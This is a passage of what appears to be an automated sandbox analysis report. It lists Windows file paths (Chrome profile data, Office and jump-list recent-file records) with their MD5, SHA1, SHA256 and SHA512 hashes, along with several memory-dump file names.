| SHA256 | ca684bf4497fa91abbddefc5a6c0a500b8f641f4418beb8610dc2fa677eaac55 |
| SHA512 | 20b8aeff1ecaac814e776e2e6b79b6637e7329636ff4b68d78441d34d37ee6f7baed096d91d19aefcea16ab2227b6fbe6ac63df10ae49e454043f5babec423a4 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | ecb8db40ae8c6a3ff764ba48acc89c78 |
| SHA1 | a30dafc2e1c6e42e1b28b9a4ffb1804fc0cf2436 |
| SHA256 | 76d0e28d41cf4a926aed9e7d4ba9865297a6d017f94622eaf7cfe55ed5b660be |
| SHA512 | a8554daf9c4fb14571e33d0453b6a45f72113179f77d1dcb671707f42a441079b4c48c61425b51d18540a587e4dcf769b798109e4350316460d43752b93bf1aa |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | bae164fcaf40542f721a7b1084cbb144 |
| SHA1 | f727e9ba5a106f77be1ca3685ef6706bc00b32ba |
| SHA256 | 8a0f63c5974c87c8689a70202ec4eac7f7024affe56ddb49844c4e94ed6a3c6b |
| SHA512 | be7ebf0016f8d553afaa360652d6cfad0785a82c3c42ca6014efb143a3c619aa8f67bac702e68d182bc71f5482701a59685f5d0a96f6617e34812fe9cc73c38e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 5e4494cca55bec01872a3c49ced808d6 |
| SHA1 | d0fc5475b6891104d3df7f503c208add977fddad |
| SHA256 | c9d7f4070ed9641ef0469ffbd604f21d93727592f3f1960b73c6c30f70948902 |
| SHA512 | d4129ebbbe12c7ea6dbd150cc0896f4f923331b44bd2e200bccffad1284bf14be68c007dd663758bf06be610502289203464e3fa1ef9501a81fc39220fc75b5a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GraphiteDawnCache\data_1
| MD5 | f50f89a0a91564d0b8a211f8921aa7de |
| SHA1 | 112403a17dd69d5b9018b8cede023cb3b54eab7d |
| SHA256 | b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec |
| SHA512 | bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58 |
memory/3116-3177-0x00007FFB0DA10000-0x00007FFB0DA20000-memory.dmp
memory/3116-3179-0x00007FFB0DA10000-0x00007FFB0DA20000-memory.dmp
memory/3116-3178-0x00007FFB0DA10000-0x00007FFB0DA20000-memory.dmp
memory/3116-3180-0x00007FFB0DA10000-0x00007FFB0DA20000-memory.dmp
memory/3116-3181-0x00007FFB0DA10000-0x00007FFB0DA20000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
| MD5 | 7a699530e4b7784c7b2e5e3ded5ef279 |
| SHA1 | f4a93e4e552f1e9bba2524d89c116366fa44fffc |
| SHA256 | 5000e2e9680de9d2295a8cc8805c094e28b2d6d1f8d39dda831df2b194d30c24 |
| SHA512 | e772270ad7fb9514c6e5d5b8b78d9ff010cd67b7b279a5f485df9005c371e0bcc85e6551c6c03c7691f7f3e9750335e540c632fc3e99f9904ce2bdf8a4710f8a |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
| MD5 | 182019040531705b8a741656825def9c |
| SHA1 | d659414b2dd65a0d535415a851c3d0f2b1ee30d9 |
| SHA256 | c05ac0dddefd90d116a1438008ac4aebe1ac811bad096d1e8f465e4563b4f6ee |
| SHA512 | 4716a208e33604aab320cbf220fa09390d6a35b865d5a89ec0ff2e122bde3959099ee494701b4b9a39b4a275cca0a392d2d47abec5d12c951dde0533ba9d198c |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
| MD5 | 5adf33653978d4aa3ec36cf9c891362c |
| SHA1 | 0604e46191c6077e35b4f359d101f4f2876aca82 |
| SHA256 | cf84e13e9338926dc3d49ec735c5979499bda9191d384ec89e39371d1645b390 |
| SHA512 | e37ea5cb7edbace8fe1ce2890449e04578e59b7518e568a5d79cf03c2a9f43f28903e32fcaa5bd97545695185aa1c3d5982f3ec234c06740c600465be5c1100f |